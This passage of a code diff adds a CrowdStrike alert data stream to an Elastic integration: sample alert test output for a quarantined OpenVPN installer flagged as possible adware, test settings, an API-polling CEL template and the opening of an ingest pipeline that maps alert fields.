"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "grandparent_details": { + "cmdline": "C:\\Windows\\system32\\userinit.exe", + "filename": "userinit.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe", + "local_process_id": "4328", + "md5": "b07f77fd3f9828b2c9d61f8a36609741", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135", + "process_id": "392734873135", + "sha256": "caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "timestamp": "2023-10-30T16:49:19.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "yuvraj.mahajan" + }, + "has_script_or_module_ioc": true, + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "indicator_id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ioc_context": [ + { + "ioc_description": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "ioc_source": "library_load", + "ioc_type": "hash_sha256", + "ioc_value": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "type": "module" + } + ], + "is_synthetic_quarantine_disposition": true, + "local_process_id": "17076", + "logon_domain": "ABSYS", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "name": "PrewittPupAdwareSensorDetect-Lowest", + "objective": "FalconDetectionMethod", + "parent_details": { + "cmdline": "C:\\WINDOWS\\Explorer.EXE", + "filename": "explorer.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\explorer.exe", + "local_process_id": "1040", + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "process_id": "392736520876", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "timestamp": "2023-11-03T18:00:32.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + }, + "parent_process_id": "392736520876", + "pattern_disposition": 2176, + "pattern_disposition_description": "Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.", + "pattern_disposition_details": { + "blocking_unsupported_or_disabled": false, + "bootup_safeguard_enabled": false, + "critical_process_disabled": false, + "detect": false, + "fs_operation_blocked": false, + "handle_operation_downgraded": false, + "inddet_mask": false, + "indicator": false, + "kill_action_failed": false, + "kill_parent": false, + "kill_process": false, + "kill_subprocess": false, + "operation_blocked": false, + "policy_disabled": false, + "process_blocked": true, + "quarantine_file": true, + "quarantine_machine": false, + "registry_operation_blocked": false, + "rooting": false, + "sensor_only": false, + "suspend_parent": false, + "suspend_process": false + }, + "pattern_id": "5761", + "platform": "Windows", + "poly_id": "AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==", + "process_end_time": "2023-11-03T18:00:21.000Z", + "process_id": "399748687993", + "process_start_time": "2023-11-03T18:00:13.000Z", + "product": "epp", + "quarantined_files": [ + { + "filename": "\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "state": "quarantined" + } + ], + "scenario": "NGAV", + "severity": 30, + "sha1": "0000000000000000000000000000000000000000", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "show_in_ui": true, + "source_products": [ + "FalconInsight" + ], + "source_vendors": [ + "CrowdStrike" + ], + "status": "new", + "tactic": "MachineLearning", + "tactic_id": "CSTA0004", + "technique": "Adware/PUP", + "technique_id": "CST0000", + "timestamp": "2023-11-03T18:00:22.328Z", + "tree_id": "1931778", + "tree_root": "38687993", + "triggering_process_graph_id": "pid:2ce4124ad4adc8c1c54dbfec4b:399748687993", + "type": "ldt", + "updated_timestamp": "2023-11-03T19:00:23.985Z", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + } + }, + "device": { + "id": "2ce412d17b334ad4adc8c1c54dbfec4b" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "kind": "alert", + "original": "{\"agent_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"aggregate_id\":\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"alleged_filetype\":\"exe\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"cloud_indicator\":\"false\",\"cmdline\":\"\\\"C:\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\\\"\",\"composite_id\":\"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"confidence\":10,\"context_timestamp\":\"2023-11-03T18:00:31Z\",\"control_graph_id\":\"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778\",\"crawl_edge_ids\":{\"Sensor\":[\"KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\\\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N\",\"KZcZA__;?\\\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\\\"__\\\"59K'R?_=`'`rK/'hA\\\"r+L5i-*Ut5PI!!*'!\",\"N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\\\"%MDAR=fo41Z]rXc\\\"J-\\\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr\",\"N6CUF__;K!d$:\\\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\\\"X'\\\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\\\"<_/?I'[##WMh'H[Rcl+!!<<'\",\"N6L[G__;K!d\\\"qhT7k?[D\\\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\\\"d.&=To@9kS!prs8N\"]},\"crawl_vertex_ids\":{\"Sensor\":[\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993\",\"quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\"]},\"crawled_timestamp\":\"2023-11-03T19:00:23.985020992Z\",\"created_timestamp\":\"2023-11-03T18:01:23.995794943Z\",\"data_domains\":[\"Endpoint\"],\"description\":\"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.\",\"device\":{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-10-12T03:45:57.753Z\",\"agent_version\":\"7.04.17605.0\",\"bios_manufacturer\":\"ABC\",\"bios_version\":\"F8CN42WW(V2.05)\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"config_id_base\":\"65994763\",\"config_id_build\":\"17605\",\"config_id_platform\":\"3\",\"device_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"external_ip\":\"81.2.69.142\",\"first_seen\":\"2023-04-07T09:36:36Z\",\"groups\":[\"18704e21288243b58e4c76266d38caaf\"],\"hostinfo\":{\"active_directory_dn_display\":[\"WinComputers\",\"WinComputers\\\\ABC\"],\"domain\":\"ABC.LOCAL\"},\"hostname\":\"ABC709-1175\",\"last_seen\":\"2023-11-03T17:51:42Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"ab-21-48-61-05-b2\",\"machine_domain\":\"ABC.LOCAL\",\"major_version\":\"10\",\"minor_version\":\"0\",\"modified_timestamp\":\"2023-11-03T17:53:43Z\",\"os_version\":\"Windows11\",\"ou\":[\"ABC\",\"WinComputers\"],\"platform_id\":\"0\",\"platform_name\":\"Windows\",\"pod_labels\":null,\"product_type\":\"1\",\"product_type_desc\":\"Workstation\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"LENOVO\",\"system_product_name\":\"20VE\"},\"falcon_host_link\":\"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"filename\":\"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"grandparent_details\":{\"cmdline\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"filename\":\"userinit.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\userinit.exe\",\"local_process_id\":\"4328\",\"md5\":\"b07f77fd3f9828b2c9d61f8a36609741\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135\",\"process_id\":\"392734873135\",\"sha256\":\"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"timestamp\":\"2023-10-30T16:49:19Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"yuvraj.mahajan\"},\"has_script_or_module_ioc\":\"true\",\"id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"indicator_id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"ioc_context\":[{\"ioc_description\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"ioc_source\":\"library_load\",\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"type\":\"module\"}],\"ioc_values\":[],\"is_synthetic_quarantine_disposition\":true,\"local_process_id\":\"17076\",\"logon_domain\":\"ABSYS\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"name\":\"PrewittPupAdwareSensorDetect-Lowest\",\"objective\":\"FalconDetectionMethod\",\"parent_details\":{\"cmdline\":\"C:\\\\WINDOWS\\\\Explorer.EXE\",\"filename\":\"explorer.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\explorer.exe\",\"local_process_id\":\"1040\",\"md5\":\"8cc3fcdd7d52d2d5221303c213e044ae\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"process_id\":\"392736520876\",\"sha256\":\"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"timestamp\":\"2023-11-03T18:00:32Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"},\"parent_process_id\":\"392736520876\",\"pattern_disposition\":2176,\"pattern_disposition_description\":\"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.\",\"pattern_disposition_details\":{\"blocking_unsupported_or_disabled\":false,\"bootup_safeguard_enabled\":false,\"critical_process_disabled\":false,\"detect\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"inddet_mask\":false,\"indicator\":false,\"kill_action_failed\":false,\"kill_parent\":false,\"kill_process\":false,\"kill_subprocess\":false,\"operation_blocked\":false,\"policy_disabled\":false,\"process_blocked\":true,\"quarantine_file\":true,\"quarantine_machine\":false,\"registry_operation_blocked\":false,\"rooting\":false,\"sensor_only\":false,\"suspend_parent\":false,\"suspend_process\":false},\"pattern_id\":5761,\"platform\":\"Windows\",\"poly_id\":\"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==\",\"process_end_time\":\"1699034421\",\"process_id\":\"399748687993\",\"process_start_time\":\"1699034413\",\"product\":\"epp\",\"quarantined_files\":[{\"filename\":\"\\\\Device\\\\Volume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"id\":\"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"state\":\"quarantined\"}],\"scenario\":\"NGAV\",\"severity\":30,\"sha1\":\"0000000000000000000000000000000000000000\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"show_in_ui\":true,\"source_products\":[\"FalconInsight\"],\"source_vendors\":[\"CrowdStrike\"],\"status\":\"new\",\"tactic\":\"MachineLearning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Adware/PUP\",\"technique_id\":\"CST0000\",\"timestamp\":\"2023-11-03T18:00:22.328Z\",\"tree_id\":\"1931778\",\"tree_root\":\"38687993\",\"triggering_process_graph_id\":\"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993\",\"type\":\"ldt\",\"updated_timestamp\":\"2023-11-03T19:00:23.985007341Z\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"}", + "severity": 30 + }, + "file": { + "name": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "path": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe" + }, + "host": { + "domain": "ABC.LOCAL", + "hostname": "ABC709-1175", + "ip": [ + "81.2.69.142" + ], + "mac": [ + "AB-21-48-61-05-B2" + ], + "os": { + "full": "Windows11", + "platform": "Windows" + } + }, + "message": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "process": { + "end": "2023-11-03T18:00:21.000Z", + "parent": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "hash": { + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4" + }, + "pid": 392736520876 + }, + "pid": 399748687993, + "start": "2023-11-03T18:00:13.000Z", + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } + }, + "related": { + "hash": [ + "ABC709-1175", + "b07f77fd3f9828b2c9d61f8a36609741", + "cdf9cfebb400ce89d5b6032bfcdc693b", + "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "8cc3fcdd7d52d2d5221303c213e044ae", + "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "0000000000000000000000000000000000000000" + ], + "hosts": [ + "ABC.LOCAL" + ], + "ip": [ + "81.2.69.142" + ], + "user": [ + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "S-1-5-21-1909377054-3469629671-4104191496-4425", + "yuvraj.mahajan", + "mohit.jha" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "tactic": { + "id": [ + "TA0004" + ], + "name": [ + "MachineLearning" + ] + }, + "technique": { + "id": [ + "T0000" + ], + "name": [ + "Adware/PUP" + ] + } + }, + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } + } + ] +} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-common-config.yml b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..be41bb0d476 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,4 @@ +fields: + tags: + - preserve_original_event + - preserve_duplicate_custom_fields diff --git a/packages/crowdstrike/data_stream/alert/_dev/test/system/test-common-config.yml b/packages/crowdstrike/data_stream/alert/_dev/test/system/test-common-config.yml new file mode 100644 index 00000000000..6bec1ba6b0e --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/_dev/test/system/test-common-config.yml @@ -0,0 +1,15 @@ +input: cel +service: crowdstrike-alert +vars: + url: http://{{Hostname}}:{{Port}} + client_id: xxxx + client_secret: xxxx + token_url: http://{{Hostname}}:{{Port}}/oauth2/token +data_stream: + vars: + interval: 10s + batch_size: 1 + preserve_original_event: true + preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/crowdstrike/data_stream/alert/agent/stream/cel.yml.hbs b/packages/crowdstrike/data_stream/alert/agent/stream/cel.yml.hbs new file mode 100644 index 00000000000..8e026b01d15 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/agent/stream/cel.yml.hbs @@ -0,0 +1,103 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +request.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +resource.url: {{url}} +auth.oauth2: + client.id: {{client_id}} + client.secret: {{client_secret}} + token_url: {{token_url}} +state: + initial_interval: {{initial_interval}} + want_more: false + offset: 0 + batch_size: {{batch_size}} +redact: + fields: ~ +program: | + ( + state.with( + ( + !state.want_more ? + request("GET", state.url + "/alerts/queries/alerts/v2?sort=timestamp|asc&offset=0&limit=" + string(state.batch_size) + '&filter=timestamp:>"' + ( + has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + state.cursor.last_timestamp + '"' + : + (now - duration(state.initial_interval)).format(time_layout.RFC3339) + '"' + )) + : + request("GET", state.url + "/alerts/queries/alerts/v2?sort=timestamp|asc&offset=" + string(state.offset) + "&limit=" + string(state.batch_size) + '&filter=timestamp:>"' + ( + has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + state.cursor.first_timestamp + '"' + : + '"' + )) + ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "resources": has(body.resources) && body.resources.size() > 0 ? body.resources : "", + "want_more": ((int(state.offset) + body.resources.size()) < body.meta.pagination.total), + "offset": ((int(state.offset) + body.resources.size()) < body.meta.pagination.total) ? + int(state.offset) + int(body.resources.size()) + : + 0, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + })) + ).as(state, state.with( + !has(state.resources) || state.resources == "" ? {"events": []} : + post_request( + state.url + "/alerts/entities/alerts/v2", + "application/json", + {"composite_ids": state.resources}.encode_json() + ).do_request().as(resp, bytes(resp.Body).decode_json().as(inner_body, { + "events": inner_body.resources.map(e, { + "message": e.encode_json(), + }), + "cursor": { + "last_timestamp": ( + has(inner_body.resources) && inner_body.resources.size() > 0 ? + inner_body.resources.map(e, e.timestamp).max() + : has(state.cursor) && has(state.cursor.last_timestamp) ? + state.cursor.last_timestamp + : + null + ), + "first_timestamp": ( + has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + (state.want_more ? state.cursor.first_timestamp : state.cursor.last_timestamp) + : + (now - duration(state.initial_interval)).format(time_layout.RFC3339) + ), + }, + })) + ) + ) + ) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/crowdstrike/data_stream/alert/elasticsearch/ingest_pipeline/default.yml b/packages/crowdstrike/data_stream/alert/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..0382ee8e697 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,1377 @@ +--- +description: Pipeline for processing Alert logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: 8.11.0 + - set: + field: event.kind + tag: set_event_kind + value: alert + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + tag: json_event_original + target_field: json + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.agent_id + tag: rename_agent_id + target_field: crowdstrike.alert.agent_id + ignore_missing: true + - rename: + field: json.aggregate_id + tag: rename_aggregate_id + target_field: crowdstrike.alert.aggregate_id + ignore_missing: true + - rename: + field: json.alleged_filetype + tag: rename_alleged_filetype + target_field: crowdstrike.alert.alleged_filetype + ignore_missing: true + - rename: + field: json.cid + tag: rename_cid + target_field: crowdstrike.alert.cid + ignore_missing: true + - convert: + field: json.cloud_indicator + tag: convert_cloud_indicator_to_boolean + target_field: crowdstrike.alert.cloud_indicator + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.cmdline + tag: rename_cmdline + target_field: crowdstrike.alert.cmdline + ignore_missing: true + - rename: + field: json.composite_id + tag: rename_composite_id + target_field: crowdstrike.alert.composite_id + ignore_missing: true + - convert: + field: json.confidence + tag: convert_confidence_to_long + target_field: crowdstrike.alert.confidence + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.context_timestamp + tag: date_context_timestamp + target_field: crowdstrike.alert.context_timestamp + formats: + - ISO8601 + if: ctx.json?.context_timestamp != null && ctx.json.context_timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.control_graph_id + tag: rename_control_graph_id + target_field: crowdstrike.alert.control_graph_id + ignore_missing: true + - rename: + field: json.crawl_edge_ids.Sensor + tag: rename_crawl_edge_ids_Sensor + target_field: crowdstrike.alert.crawl_edge_ids.Sensor + ignore_missing: true + - rename: + field: json.crawl_vertex_ids.Sensor + tag: rename_crawl_vertex_ids_Sensor + target_field: crowdstrike.alert.crawl_vertex_ids.Sensor + ignore_missing: true + - date: + field: json.crawled_timestamp + tag: date_crawled_timestamp + target_field: crowdstrike.alert.crawled_timestamp + formats: + - ISO8601 + if: ctx.json?.crawled_timestamp != null && ctx.json.crawled_timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.created_timestamp + tag: date_created_timestamp + target_field: crowdstrike.alert.created_timestamp + formats: + - ISO8601 + if: ctx.json?.created_timestamp != null && ctx.json.created_timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.data_domains + tag: rename_data_domains + target_field: crowdstrike.alert.data_domains + ignore_missing: true + - rename: + field: json.description + tag: rename_description + target_field: crowdstrike.alert.description + ignore_missing: true + - set: + field: message + tag: set_message_from_alert_description + copy_from: crowdstrike.alert.description + ignore_empty_value: true + - convert: + field: json.device.agent_load_flags + tag: convert_device_agent_load_flags_to_long + target_field: crowdstrike.alert.device.agent_load_flags + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device.agent_local_time + tag: date_device_agent_local_time + target_field: crowdstrike.alert.device.agent_local_time + formats: + - ISO8601 + if: ctx.json?.device?.agent_local_time != null && ctx.json.device.agent_local_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device.agent_version + tag: rename_device_agent_version + target_field: crowdstrike.alert.device.agent_version + ignore_missing: true + - rename: + field: json.device.bios_manufacturer + tag: rename_device_bios_manufacturer + target_field: crowdstrike.alert.device.bios_manufacturer + ignore_missing: true + - rename: + field: json.device.bios_version + tag: rename_device_bios_version + target_field: crowdstrike.alert.device.bios_version + ignore_missing: true + - rename: + field: 